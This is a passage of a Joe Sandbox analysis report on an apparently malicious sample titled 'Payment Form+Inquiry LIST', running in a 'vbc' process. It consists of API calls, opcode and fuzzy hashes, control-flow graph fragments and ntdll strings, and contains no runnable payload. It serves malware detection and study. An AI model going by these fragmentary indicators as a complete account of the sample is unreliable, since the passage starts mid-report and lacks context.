                            • Opcode Fuzzy Hash: 3975dceb791f57bb3fcf29378d87f0c658d09fa8d7692f204abce351d6e993e4
                            • Instruction Fuzzy Hash: 42115B33A19B8086EB208F25E50036977E6FF88B94F184234DE9C47768DF3DC5518B08
                            APIs
                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF6E825D913,?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825E0EB
                            • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF6E825D913,?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825E128
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: _stricmpstrtoull
                            • String ID: HeapVerify
                            • API String ID: 4031153986-2674988305
                            • Opcode ID: 6676ef8255daf0935dec1f4c384c2b73da7f904fbf3830ba254776d158681313
                            • Instruction ID: bf92ad869fb29ed13efa765d1b1bd6333de4e8ed598fc0d9c7fb69e122afb1da
                            • Opcode Fuzzy Hash: 6676ef8255daf0935dec1f4c384c2b73da7f904fbf3830ba254776d158681313
                            • Instruction Fuzzy Hash: 41019236A09A41CAE714DF22E9801B9B360FB54790B589431DA8D93B19CE3ED581874E
                            APIs
                            • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6E82757BF,?,?,?,00007FF6E8282F8B), ref: 00007FF6E827568D
                            • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6E82757BF,?,?,?,00007FF6E8282F8B), ref: 00007FF6E82756E2
                            • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6E82757BF,?,?,?,00007FF6E8282F8B), ref: 00007FF6E82756FF
                            • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6E82757BF,?,?,?,00007FF6E8282F8B), ref: 00007FF6E827571C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 29070b862ed98ea1ac05cf7a7111bb372c5032687568700d2cf239e38bc29c80
                            • Instruction ID: 98f41a102402f8f9cb63446c2b04da38ab132d9349eec1149691419af28b3e3b
                            • Opcode Fuzzy Hash: 29070b862ed98ea1ac05cf7a7111bb372c5032687568700d2cf239e38bc29c80
                            • Instruction Fuzzy Hash: 6021BF23A1CA4AD6EA008F31AB503B963A4EF957E0F550234D96CC36D5CF2EE049834E

                            Execution Graph

                            Execution Coverage:1.4%
                            Dynamic/Decrypted Code Coverage:4.9%
                            Signature Coverage:9.2%
                            Total number of Nodes:142
                            Total number of Limit Nodes:10

                            Control-flow Graph

                            control_flow_graph 224 417a33-417a5c call 42e163 227 417a62-417a70 call 42e683 224->227 228 417a5e-417a61 224->228 231 417a80-417a91 call 42cb23 227->231 232 417a72-417a7d call 42e923 227->232 238 417a93-417aa7 LdrLoadDll 231->238 239 417aaa-417aad 231->239 232->231 238->239
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                            • Instruction ID: a14b4ffdb5fe0ebae34abb196159bdaefeaa327230b00d9eb3ec642f8eb76095
                            • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                            • Instruction Fuzzy Hash: 940112B5E4010DBBDF10DAA5DC42FDEB7789F54304F004196E90897241F635EB548755

                            Control-flow Graph

                            control_flow_graph 245 42b593-42b5cf call 4049a3 call 42c643 NtClose
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                            • Instruction ID: 1573654a4f4f23356e70bd42089c4cb39e63ab89980323d43f3de8af3be88636
                            • Opcode Fuzzy Hash: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                            • Instruction Fuzzy Hash: 6BE04676204254BBC220AA6AEC41F9F776DDFC5724F00442AFA08A7282C6B5BA1186E5
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 03a4c67ca9b9826c9182a7b4ff12bc54aa7db0860129f46eeaafe2bd98463049
                            • Instruction ID: b384b597af71759a2400a3fa77ca364b6e84dcbbf883e7d41946f77199ffa98e
                            • Opcode Fuzzy Hash: 03a4c67ca9b9826c9182a7b4ff12bc54aa7db0860129f46eeaafe2bd98463049
                            • Instruction Fuzzy Hash: BE90027260550412E10071684A54746101987D0601FA5C411E0426568D87D98A5169A2
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: da9bcb7e6b47ad1fed8c0ca27ae92c1b74921715fd6bb95eb78776209b584e22
                            • Instruction ID: 227aa9d653d05965f7728cb21c711d98f59d515bbd5bcf57b6506492299df952
                            • Opcode Fuzzy Hash: da9bcb7e6b47ad1fed8c0ca27ae92c1b74921715fd6bb95eb78776209b584e22
                            • Instruction Fuzzy Hash: 2190027220140423E11171684A44747001D87D0641FD5C412E0426558D979A8A52A521
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e9749ce2f547f5695094cd84470d6ff5ecc3bf4350c824892afb3bb8738be464
                            • Instruction ID: edb7744deb43f60ae201a96a029279f15050822d388d1dc3e36c871c4be440ee
                            • Opcode Fuzzy Hash: e9749ce2f547f5695094cd84470d6ff5ecc3bf4350c824892afb3bb8738be464
                            • Instruction Fuzzy Hash: F490027220148812E1107168894478A001987D0701F99C411E4426658D87D989917521
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4ca82e71cbcc972d5b167436532628a1b42114d2d6ddb42b35487fbdea6d7843
                            • Instruction ID: 211bb8d955e79c223082fd7692a4b0e5ded6c7c02c11a8713f2d8021a915b2c1
                            • Opcode Fuzzy Hash: 4ca82e71cbcc972d5b167436532628a1b42114d2d6ddb42b35487fbdea6d7843
                            • Instruction Fuzzy Hash: DA9002A220240013510571684954656401E87E0601B95C021E1016590DC66989916525

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: 9c137fe075127a70db5381a908e253cb779df88f74039d614837a5d3f9b81308
                            • Instruction ID: e9a8c8687aaeafff36046211043bea6d8f886e60d9afbd7522c3a782f38ba3bd
                            • Opcode Fuzzy Hash: 9c137fe075127a70db5381a908e253cb779df88f74039d614837a5d3f9b81308
                            • Instruction Fuzzy Hash: A1118973904158BBDB029B749C46DEFFF7CEF81350B0480AEFA5467142D6394E4287A5

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: 34911ca6fa78662a9a750860d5d86970cb422ce9c6129bf029718bd3649f74d8
                            • Instruction ID: d6e4ff19b95466e9fe5a75fee5ad12c3f5ada0eb833e20bbb35db8e367bde451
                            • Opcode Fuzzy Hash: 34911ca6fa78662a9a750860d5d86970cb422ce9c6129bf029718bd3649f74d8
                            • Instruction Fuzzy Hash: 6E0166B2D0010C7ADB109FE19C82EEFAB7CDF84798F40802AFA04B7241D2784F4687A5

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: c91aaa8decee38f3a30e2a95e9d8b0a291183a2d72e685fc848b434c8b6d8a09
                            • Instruction ID: cf9192664244b9ac975f5907ec0277faeb991ed911cf0314b90d64a2ad3432a1
                            • Opcode Fuzzy Hash: c91aaa8decee38f3a30e2a95e9d8b0a291183a2d72e685fc848b434c8b6d8a09
                            • Instruction Fuzzy Hash: 9011E5B2D0411C7EEB119FA19C82DEFBB7CDF417A8F008069FA04A7141D6794F0687A5

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: 5772162eecc2fe24cd4613575fecf9fb22c6b493dc5cb581e736842785e4031c
                            • Instruction ID: 3a752632b7030014dc9c9c30b5bcc15c88147ef53de421226a9d1532deb992d1
                            • Opcode Fuzzy Hash: 5772162eecc2fe24cd4613575fecf9fb22c6b493dc5cb581e736842785e4031c
                            • Instruction Fuzzy Hash: D901C4B2D0021C7AEB11AFE19C82DEFBB7CDF41798F408069FA14A7241D6794F0647A5

                            Control-flow Graph

                            control_flow_graph 71 42b903-42b947 call 4049a3 call 42c643 RtlFreeHeap
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B942
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: gA
                            • API String ID: 3298025750-3478526202
                            • Opcode ID: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                            • Instruction ID: fe3716f387f97a3cfac574e56e7d4e73213d1ab919c33c628ae6fa0e6f0a2ede
                            • Opcode Fuzzy Hash: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                            • Instruction Fuzzy Hash: A9E06DB12043047BC620EE59EC45F9B73ACEFC5714F000029FA08A7241C671BA108AF9

                            Control-flow Graph

                            control_flow_graph 203 417ab3-417abf 204 417ac1-417acf 203->204 205 417a8f-417a91 203->205 208 417ad1-417ad5 204->208 209 417a64-417a65 204->209 206 417a93-417aa7 LdrLoadDll 205->206 207 417aaa-417aad 205->207 206->207 212 417ad7-417b09 208->212 213 417b2a 208->213 210 417a6b-417a70 209->210 211 417a66 call 42e683 209->211 214 417a80-417a8c call 42cb23 210->214 215 417a72-417a7d call 42e923 210->215 211->210 216 417b67-417b91 213->216 217 417b2c-417b2d 213->217 214->205 215->214
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 06c304be024d8702e79fa6f4f19215bbb79918f4870c72a52a1b29490fcb6eb2
                            • Instruction ID: 6c43b7506f89a022c64d044e6c1ccbca58ffe011e8d6516ae037575ea145fc98
                            • Opcode Fuzzy Hash: 06c304be024d8702e79fa6f4f19215bbb79918f4870c72a52a1b29490fcb6eb2
                            • Instruction Fuzzy Hash: 8C219D73A4810A6BDB01D998DC82ADEBB68EF41748F14415AE805DB343EB35EA06C7E5

                            Control-flow Graph

                            control_flow_graph 240 42b8b3-42b8f7 call 4049a3 call 42c643 RtlAllocateHeap
                            APIs
                            • RtlAllocateHeap.NTDLL(?,0041E238,?,?,00000000,?,0041E238,?,?,?), ref: 0042B8F2
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                            • Instruction ID: d9b541be78cc90539b36e3aa14f4a365451e7fb9285a10e02975410261364557
                            • Opcode Fuzzy Hash: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                            • Instruction Fuzzy Hash: DAE06DB62042047FD620EF59EC45E9B73ACEFC9714F004419F908A7241D671B9108AB9

                            Control-flow Graph

                            control_flow_graph 250 42b953-42b98f call 4049a3 call 42c643 ExitProcess
                            APIs
                            • ExitProcess.KERNEL32(?,00000000,?,?,0FADE886,?,?,0FADE886), ref: 0042B98A
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 06b400fc049ae8453f422dbdba32e523414dcf3d7d78a6a6816b0409ae45605f
                            • Instruction ID: c24f298f8ce9a33bcb8732fbd3dc6627db416b18a23357072eb898eabaee20fe
                            • Opcode Fuzzy Hash: 06b400fc049ae8453f422dbdba32e523414dcf3d7d78a6a6816b0409ae45605f
                            • Instruction Fuzzy Hash: 5BE04F756012147BD620AB5AEC41F9B775CDBC5714F40406AFA08A7145C6747A1187F5
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 513596e18ded363fc935bf57ff149fd4b15d3fc53044d882cbbdf82f140c1c35
                            • Instruction ID: 1c0b9764833fc850a9316bae6c2d587336ab224aa735b56e951395c087e44c2c
                            • Opcode Fuzzy Hash: 513596e18ded363fc935bf57ff149fd4b15d3fc53044d882cbbdf82f140c1c35
                            • Instruction Fuzzy Hash: 6AB09B779015C5D5FA11E7704B08B17791577D0701F65C461D2131641E477CC1D1E575
                            Strings
                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 051D540A, 051D5496, 051D5519
                            • Thread identifier, xrefs: 051D553A
                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 051D54E2
                            • Critical section address., xrefs: 051D5502
                            • double initialized or corrupted critical section, xrefs: 051D5508
                            • Address of the debug info found in the active list., xrefs: 051D54AE, 051D54FA
                            • Critical section debug info address, xrefs: 051D541F, 051D552E
                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 051D54CE
                            • Thread is in a state in which it cannot own a critical section, xrefs: 051D5543
                            • Invalid debug info address of this critical section, xrefs: 051D54B6
                            • undeleted critical section in freed memory, xrefs: 051D542B
                            • corrupted critical section, xrefs: 051D54C2
                            • Critical section address, xrefs: 051D5425, 051D54BC, 051D5534
                            • 8, xrefs: 051D52E3
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                            Strings
                            • @, xrefs: 0515D313
                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0515D262
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0515D2C3
                            • @, xrefs: 0515D2AF
                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0515D146
                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 0515D196
                            • @, xrefs: 0515D0FD
                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0515D0CF
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                            Strings
                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 051B9A01
                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 051B9A2A
                            • LdrpInitShimEngine, xrefs: 051B99F4, 051B9A07, 051B9A30
                            • minkernel\ntdll\ldrinit.c, xrefs: 051B9A11, 051B9A3A
                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 051B99ED
                            • apphelp.dll, xrefs: 05156496
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                            Strings
                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 051D2180
                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 051D2178
                            • SXS: %s() passed the empty activation context, xrefs: 051D2165
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 051D21BF
                            • RtlGetAssemblyStorageRoot, xrefs: 051D2160, 051D219A, 051D21BA
                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 051D219F
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                            Strings
                            • LdrpInitializeImportRedirection, xrefs: 051D8177, 051D81EB
                            • minkernel\ntdll\ldrinit.c, xrefs: 0519C6C3
                            • minkernel\ntdll\ldrredirect.c, xrefs: 051D8181, 051D81F5
                            • Loading import redirection DLL: '%wZ', xrefs: 051D8170
                            • LdrpInitializeProcess, xrefs: 0519C6C4
                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 051D81E5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 051D02BD
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 051D02E7
                            • RTL: Re-Waiting, xrefs: 051D031E
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            Strings
                            • Kernel-MUI-Number-Allowed, xrefs: 05185247
                            • Kernel-MUI-Language-Allowed, xrefs: 0518527B
                            • Kernel-MUI-Language-Disallowed, xrefs: 05185352
                            • Kernel-MUI-Language-SKU, xrefs: 0518542B
                            • WindowsExcludedProcs, xrefs: 0518522A
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
